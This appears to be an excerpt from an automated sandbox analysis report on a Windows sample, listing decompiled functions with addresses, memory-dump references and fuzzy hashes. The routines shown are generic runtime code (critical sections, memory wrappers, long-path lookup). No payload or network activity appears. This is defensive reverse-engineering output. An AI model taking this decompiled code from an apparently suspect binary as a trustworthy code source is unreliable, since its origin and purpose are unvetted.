                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 53a5e388460097ad979b2f6b1751e3785bbb0734f72ca006e83e189d688f904d
                                                                                                                                                                                          • Instruction ID: a39998da354941932be30b75230dcc4d4fc0d6cca697558af4a9f8847da12a48
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53a5e388460097ad979b2f6b1751e3785bbb0734f72ca006e83e189d688f904d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CF02729310662C387206F1AE8801A6E3F65FB0708784082BE802CB330CB29FD87C39D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041DA30 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                          			E0041DA30(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _t10;
				intOrPtr _t22;
				void* _t27;

				_push(__ebx);
				_v12 = E0041E254(__eax, 1, 0x1000);
				_push(_t27);
				_push(0x41da80);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffff8;
				_t10 = E00420288(_v12, __edx, __edx, __edi, __esi); // executed
				_v8 = _t10;
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(E0041DA87);
				return E00403BEC(_v12);
			}








                                                                                                                                                                                          0x0041da36
                                                                                                                                                                                          0x0041da4c
                                                                                                                                                                                          0x0041da51
                                                                                                                                                                                          0x0041da52
                                                                                                                                                                                          0x0041da57
                                                                                                                                                                                          0x0041da5a
                                                                                                                                                                                          0x0041da62
                                                                                                                                                                                          0x0041da67
                                                                                                                                                                                          0x0041da6c
                                                                                                                                                                                          0x0041da6f
                                                                                                                                                                                          0x0041da72
                                                                                                                                                                                          0x0041da7f

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 19aff12e0b1e691b5c8c266769c69c4a5206ab863e7a2c02aa5f11a2944d0973
                                                                                                                                                                                          • Instruction ID: c22338b0050deed01fa98a3531088c417efafeb2735dda64bfa9675eecbf4217
                                                                                                                                                                                          • Opcode Fuzzy Hash: 19aff12e0b1e691b5c8c266769c69c4a5206ab863e7a2c02aa5f11a2944d0973
                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0E570B48304AFDB01DF69CCA299DBBF9EB88704B9140B6F800D77D1DA396D40C658
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041DD9A Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E0041DD9A(void* __eax, void* __ebx, void* __edx, void* __edi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t6;
				void* _t14;
				intOrPtr _t22;
				intOrPtr _t26;

				_t14 = __eax;
				_t6 = E0041DB54(__edx, 1, __edi, 0xffff); // executed
				_v8 = _t6;
				_push(_t26);
				_push(0x41dde7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E0041DD84(_t14, _v8);
				_pop(_t22);
				 *[fs:eax] = _t22;
				_push(E0041DDEE);
				return E00403BEC(_v8);
			}









                                                                                                                                                                                          0x0041dda1
                                                                                                                                                                                          0x0041ddb1
                                                                                                                                                                                          0x0041ddb6
                                                                                                                                                                                          0x0041ddbb
                                                                                                                                                                                          0x0041ddbc
                                                                                                                                                                                          0x0041ddc1
                                                                                                                                                                                          0x0041ddc4
                                                                                                                                                                                          0x0041ddcc
                                                                                                                                                                                          0x0041ddd3
                                                                                                                                                                                          0x0041ddd6
                                                                                                                                                                                          0x0041ddd9
                                                                                                                                                                                          0x0041dde6

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: d805921053cab12f1aff89088d000b67acde02810a30df3053d02e4dd66eb7b9
                                                                                                                                                                                          • Instruction ID: 77126a7f4a464f9e50d4d0ebe1e21c70392648a74c15d85cca1f496c85fdaa23
                                                                                                                                                                                          • Opcode Fuzzy Hash: d805921053cab12f1aff89088d000b67acde02810a30df3053d02e4dd66eb7b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E092B0704304BFE715DF6ADC528B9B7EDEB497047A2447AF800C3781E579AD00D558
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041DB54 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E0041DB54(void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t2;
				void* _t6;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_t13 = __edi;
				_t11 = __edx;
				_t10 = __ecx;
				if(__edx != 0) {
					_t16 = _t16 + 0xfffffff0;
					_t2 = E00403F10(_t2, _t15);
				}
				_t9 = _t11;
				_t14 = _t2;
				E0041DB98(_t9, _t10, 0, _t13, _t14, 0, _a4); // executed
				_t6 = _t14;
				if(_t9 != 0) {
					E00403F68(_t6);
					_pop( *[fs:0x0]);
				}
				return _t14;
			}















                                                                                                                                                                                          0x0041db54
                                                                                                                                                                                          0x0041db54
                                                                                                                                                                                          0x0041db54
                                                                                                                                                                                          0x0041db5b
                                                                                                                                                                                          0x0041db5d
                                                                                                                                                                                          0x0041db60
                                                                                                                                                                                          0x0041db60
                                                                                                                                                                                          0x0041db65
                                                                                                                                                                                          0x0041db67
                                                                                                                                                                                          0x0041db74
                                                                                                                                                                                          0x0041db79
                                                                                                                                                                                          0x0041db7d
                                                                                                                                                                                          0x0041db7f
                                                                                                                                                                                          0x0041db84
                                                                                                                                                                                          0x0041db8b
                                                                                                                                                                                          0x0041db93

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: db5a30473c6975bc2799159453e295b63a6c9dc742ecd88cc1671afa47ab3929
                                                                                                                                                                                          • Instruction ID: 0d0d2afe6bf39cf4096298ab9ec3f81a7ae9b9fcfee1dcf277247a4ef13b5e0b
                                                                                                                                                                                          • Opcode Fuzzy Hash: db5a30473c6975bc2799159453e295b63a6c9dc742ecd88cc1671afa47ab3929
                                                                                                                                                                                          • Instruction Fuzzy Hash: FBE026A7F44515A6C10062AE1C02BE6BB4C8B45EE5F084132FD04CB3C5E92A1D9042ED
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B3C Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E00406B3C() {
				intOrPtr _t12;
				intOrPtr _t15;

				_push(_t15);
				_push(0x406b86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t15;
				 *0x49e5bc =  *0x49e5bc + 1;
				if( *0x49e5bc == 0) {
					E0040308C(0x49e050);
					E0040308C(0x49e21c);
					E0040308C(0x49e3e8); // executed
					E00401B60(); // executed
				}
				_pop(_t12);
				 *[fs:eax] = _t12;
				_push(E00406B8D);
				return 0;
			}





                                                                                                                                                                                          0x00406b41
                                                                                                                                                                                          0x00406b42
                                                                                                                                                                                          0x00406b47
                                                                                                                                                                                          0x00406b4a
                                                                                                                                                                                          0x00406b4d
                                                                                                                                                                                          0x00406b53
                                                                                                                                                                                          0x00406b5a
                                                                                                                                                                                          0x00406b64
                                                                                                                                                                                          0x00406b6e
                                                                                                                                                                                          0x00406b73
                                                                                                                                                                                          0x00406b73
                                                                                                                                                                                          0x00406b7a
                                                                                                                                                                                          0x00406b7d
                                                                                                                                                                                          0x00406b80
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$FreeLocal$DeleteEnterLeave
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3902855382-0
                                                                                                                                                                                          • Opcode ID: d3f9c925e53940d1e89ecad5496dc4f0f3ec69471f32a22c634fc23f783930c4
                                                                                                                                                                                          • Instruction ID: ce4ac4ccce8ffabc48854033d136ee2679cceb212af8c3e4a4a0557849e56939
                                                                                                                                                                                          • Opcode Fuzzy Hash: d3f9c925e53940d1e89ecad5496dc4f0f3ec69471f32a22c634fc23f783930c4
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3E086702042049EEB11BFA758138257B7CD746754392447FFD41E36D1DA3DA820857D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041BD4E Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0041BD4E(intOrPtr* __eax, void* __edx) {
				void* _t5;

				_t5 =  *((intOrPtr*)( *__eax + 0x14))();
				 *((intOrPtr*)( *__eax + 0x60))();
				return _t5;
			}




                                                                                                                                                                                          0x0041bd5c
                                                                                                                                                                                          0x0041bd69
                                                                                                                                                                                          0x0041bd72

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: e4d4f0dfd12197afef89ae83b8b77b19be2098b2759117c13bae605393182d02
                                                                                                                                                                                          • Instruction ID: 6efbdc4ccdc36113e02cecadc075d0426ddaca1975da5b626a2a0d663c6b49d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4d4f0dfd12197afef89ae83b8b77b19be2098b2759117c13bae605393182d02
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CD05E363002185F43009A1EEC88827BBDEEFCA56231400B2F904C7321DD60EC0587B0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040275C Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                          			E0040275C(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x49b044(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E004028B8(1);
					}
				}
				return _t6;
			}





                                                                                                                                                                                          0x0040275f
                                                                                                                                                                                          0x00402776
                                                                                                                                                                                          0x00402761
                                                                                                                                                                                          0x00402761
                                                                                                                                                                                          0x00402767
                                                                                                                                                                                          0x0040276b
                                                                                                                                                                                          0x0040276f
                                                                                                                                                                                          0x0040276f
                                                                                                                                                                                          0x0040276b
                                                                                                                                                                                          0x0040277b

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 6630d58ff1002cfec5456b12da66b92f5b59a554d4122d33bc599e3bb616606f
                                                                                                                                                                                          • Instruction ID: 13b6c59ed879b5fd502bb36a7d45a17e0ea6386aca9c77c95b672b19d204bc39
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6630d58ff1002cfec5456b12da66b92f5b59a554d4122d33bc599e3bb616606f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68C08C6830070347A3002AEA5BCC81B11CCAB24304350013FAA10E33E3EAE8C804266B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404684 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00404684(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x49e014 = 0x40124c;
				 *0x49e018 = 0x40125c;
				 *0x49e640 = __eax;
				 *0x49e644 = 0;
				 *0x49e648 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x49e030 =  *_t1;
				E0040457C();
				 *0x49e038 = 0; // executed
				_t6 = E00404624(); // executed
				return _t6;
			}





                                                                                                                                                                                          0x00404684
                                                                                                                                                                                          0x00404684
                                                                                                                                                                                          0x0040468e
                                                                                                                                                                                          0x00404698
                                                                                                                                                                                          0x0040469f
                                                                                                                                                                                          0x004046a4
                                                                                                                                                                                          0x004046aa
                                                                                                                                                                                          0x004046ad
                                                                                                                                                                                          0x004046b2
                                                                                                                                                                                          0x004046b7
                                                                                                                                                                                          0x004046be
                                                                                                                                                                                          0x004046c3

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 5289ad967a131481aedbe0cdff7ecb573cf823644b02abc9d95c3054f8611f6d
                                                                                                                                                                                          • Instruction ID: 71eb1c489c1a1ec89bd133438ffc22e46cce8f98e575952dbb78a4f2e9566ef3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5289ad967a131481aedbe0cdff7ecb573cf823644b02abc9d95c3054f8611f6d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AE042B48012109BD350DF6AE9856047AE0B775344B9485BFD108EA2B1E7B985548B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A48 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409A48(void* __eax, void* __eflags) {
				void* _t5;
				void* _t9;

				_t9 = __eflags;
				_t5 = E004099E0(__eax); // executed
				return _t5 + 0x00000001 & 0xffffff00 | _t9 != 0x00000000;
			}





                                                                                                                                                                                          0x00409a48
                                                                                                                                                                                          0x00409a4d
                                                                                                                                                                                          0x00409a57

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2659516521-0
                                                                                                                                                                                          • Opcode ID: c45e69e87e8c0d194b88b7eb729f52060ac0642bc4977fd573525d8fbca6fbc5
                                                                                                                                                                                          • Instruction ID: db47324047d83e8823bb5ce5341e4a4d59c1ad783672ea57bd8f0ecd43d70fc7
                                                                                                                                                                                          • Opcode Fuzzy Hash: c45e69e87e8c0d194b88b7eb729f52060ac0642bc4977fd573525d8fbca6fbc5
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9A022C03022020BC20020FE0CC300A00CC220C020320E03E300BC2383C8AC8CA02000
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 00406018 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E00406018(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00406004(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00406004(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L0040131C();
									while( *_t93 != 0) {
										_t90 = E00406004(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L0040131C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401324();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L0040131C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401324();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L0040131C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L0040131C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                                                                                                                                          0x00406024
                                                                                                                                                                                          0x00406027
                                                                                                                                                                                          0x0040602d
                                                                                                                                                                                          0x0040603a
                                                                                                                                                                                          0x0040603e
                                                                                                                                                                                          0x00406080
                                                                                                                                                                                          0x00406086
                                                                                                                                                                                          0x004060c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406088
                                                                                                                                                                                          0x0040608f
                                                                                                                                                                                          0x004060a0
                                                                                                                                                                                          0x004060a5
                                                                                                                                                                                          0x004060ab
                                                                                                                                                                                          0x004060b3
                                                                                                                                                                                          0x004060b8
                                                                                                                                                                                          0x004060c6
                                                                                                                                                                                          0x004060c8
                                                                                                                                                                                          0x004060ce
                                                                                                                                                                                          0x004060d2
                                                                                                                                                                                          0x004060d9
                                                                                                                                                                                          0x004060da
                                                                                                                                                                                          0x00406185
                                                                                                                                                                                          0x004060ec
                                                                                                                                                                                          0x004060f0
                                                                                                                                                                                          0x004060fd
                                                                                                                                                                                          0x00406104
                                                                                                                                                                                          0x00406105
                                                                                                                                                                                          0x0040610e
                                                                                                                                                                                          0x0040610f
                                                                                                                                                                                          0x00406127
                                                                                                                                                                                          0x0040612c
                                                                                                                                                                                          0x0040612f
                                                                                                                                                                                          0x00406134
                                                                                                                                                                                          0x0040613a
                                                                                                                                                                                          0x0040613b
                                                                                                                                                                                          0x0040614b
                                                                                                                                                                                          0x0040614d
                                                                                                                                                                                          0x0040615d
                                                                                                                                                                                          0x00406164
                                                                                                                                                                                          0x0040616e
                                                                                                                                                                                          0x0040616f
                                                                                                                                                                                          0x00406174
                                                                                                                                                                                          0x0040617a
                                                                                                                                                                                          0x0040617b
                                                                                                                                                                                          0x00406181
                                                                                                                                                                                          0x00406183
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406183
                                                                                                                                                                                          0x0040614b
                                                                                                                                                                                          0x0040612c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004060fd
                                                                                                                                                                                          0x00406191
                                                                                                                                                                                          0x00406198
                                                                                                                                                                                          0x0040619c
                                                                                                                                                                                          0x0040619d
                                                                                                                                                                                          0x0040619d
                                                                                                                                                                                          0x004060b8
                                                                                                                                                                                          0x004060a5
                                                                                                                                                                                          0x0040608f
                                                                                                                                                                                          0x00406040
                                                                                                                                                                                          0x0040604b
                                                                                                                                                                                          0x0040604f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406051
                                                                                                                                                                                          0x00406051
                                                                                                                                                                                          0x0040605c
                                                                                                                                                                                          0x00406060
                                                                                                                                                                                          0x00406065
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406067
                                                                                                                                                                                          0x0040606a
                                                                                                                                                                                          0x00406071
                                                                                                                                                                                          0x00406075
                                                                                                                                                                                          0x00406076
                                                                                                                                                                                          0x00406076
                                                                                                                                                                                          0x00406065
                                                                                                                                                                                          0x0040604f
                                                                                                                                                                                          0x004061a2
                                                                                                                                                                                          0x004061ab

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
